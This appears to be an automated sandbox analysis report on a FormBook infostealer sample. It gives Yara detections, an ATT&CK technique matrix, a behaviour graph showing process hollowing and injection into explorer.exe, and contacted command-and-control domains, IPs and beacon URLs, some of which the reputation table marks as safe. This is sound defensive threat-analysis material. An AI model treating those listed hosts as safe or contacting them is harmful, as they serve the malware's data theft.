            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502374 Sample: Fu94e0b1TR Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 30 www.fis.photos 2->30 32 fis.photos 2->32 34 www.rjtherealest.com 2->34 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 5 other signatures 2->48 11 Fu94e0b1TR.exe 6 2->11         started        signatures3 process4 signatures5 62 Tries to detect virtualization through RDTSC time measurements 11->62 14 Fu94e0b1TR.exe 11->14         started        17 Fu94e0b1TR.exe 11->17         started        process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 Queues an APC in another process (thread injection) 14->70 19 explorer.exe 14->19 injected process8 dnsIp9 36 www.shacksolid.com 64.190.62.111, 49795, 80 NBS11696US United States 19->36 38 fbc7888164e64afca05b80bb89630439.pacloudflare.com 172.65.227.72, 49790, 80 CLOUDFLARENETUS United States 19->38 40 4 other IPs or domains 19->40 50 System process connects to network (likely due to code injection or exploit) 19->50 52 Uses netstat to query active network connections and open ports 19->52 23 NETSTAT.EXE 19->23         started        signatures10 process11 signatures12 54 Self deletion via cmd delete 23->54 56 Modifies the context of a thread in another process (thread injection) 23->56 58 Maps a DLL or memory area into another process 23->58 60 Tries to detect virtualization through RDTSC time measurements 23->60 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.Fu94e0b1TR.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34I0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmNormaldk0%Avira URL Cloudsafe
            http://www.fontbureau.comI.TTF0%URL Reputationsafe
            http://www.fontbureau.comdito0%Avira URL Cloudsafe
            http://www.fontbureau.comalicu0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/D0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.fontbureau.comessed0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            www.fis.photos/ef6c/0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/70%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ch0%Avira URL Cloudsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.apricitee.com/ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.fontbureau.com70%Avira URL Cloudsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.comD0%Avira URL Cloudsafe
            http://www.fontbureau.comR.TTF0%URL Reputationsafe
            http://www.fontbureau.comtuta0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmS0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/k0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
